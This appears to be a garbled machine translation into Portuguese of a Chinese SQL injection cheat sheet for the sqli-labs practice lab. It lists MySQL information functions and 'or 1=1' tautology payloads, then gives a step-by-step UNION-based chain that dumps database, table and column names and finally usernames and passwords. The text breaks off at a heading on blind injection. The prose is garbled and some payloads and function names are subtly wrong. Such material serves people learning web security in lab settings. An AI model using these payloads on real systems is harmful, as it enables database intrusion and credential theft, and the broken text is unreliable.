resumo injeção de SQL simples (a)
0x01
(1) injetado Categoria: olhos do observador sábio vê sabedoria, não aqui narrados.
(2) as funções do sistema:
Várias funções comumente usadas:
- version () - versão do sistema;
- banco de dados () - nome do banco de dados;
- user () - nome de usuário de banco de dados;
- @@ datadir-- caminho base de dados;
- @@ vision_compile_os-- versão do sistema operacional;
função de concatenação (3) cadeia
- concat (str1, str2, ...) - sem cordas delimitadores são conectados;
- CONCAT_WS ( 'separador', str1, str2, ...) - corda ligada contendo o delimitador
- group_concat (str1, str2, ...) - Ligações de agrupar todas as cordas, separados por vírgulas e
não precisa de uma compreensão detalhada do que essas três funções pode ser achado descartável para fora todo o conteúdo na linha.
(4) é geralmente usado para tentar declaração
ou 1 = 1 #
'ou 1 = 1 #
'' ou 1 = 1 #
) 1 = 1 ou #
') ou 1 = 1 #
'') ou 1 = 1 #
'')) ou 1 = 1 #
(5) as notas
- - + #, / ** / etc.
resumo
Na verdade, nada mais do que uma injeção de SQL é dividido em duas partes, uma fechada declarações Mysql; o segundo é a implementação de uma nova frase construída.
0x02 variedade de métodos e processos de injecção de
(1) Geral sqllibs injecção (Less1-4)
#注入点
-1' union select 1,2,3--+
#爆数据库
-1' union select 1,group_concat(schema_name),3 from information_schema.schemata--+
#爆表
-1' union select 1,group_concat(table_name),3 from information_schema.tables where schema_name='security'--+
#爆字段
-1‘ union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
#爆数据
-1‘ union select 1,username,password from users where id=2--+
As seguintes perguntas declaração mesmo SQL executado não vai pagar mais a dizer, apenas diferenças fechados' no caminho, diretamente ligados a ele, pode ser implantado com sucesso são:
or 1=1
or 1=1 --+
') or '1'=('1'
) or 1=1 --+
“) or ”1”=(“1
“) or 1=1 --+
(2) Mekurachu
Depois de realizar a injeção não ecoa a declaração página chamada blinds.
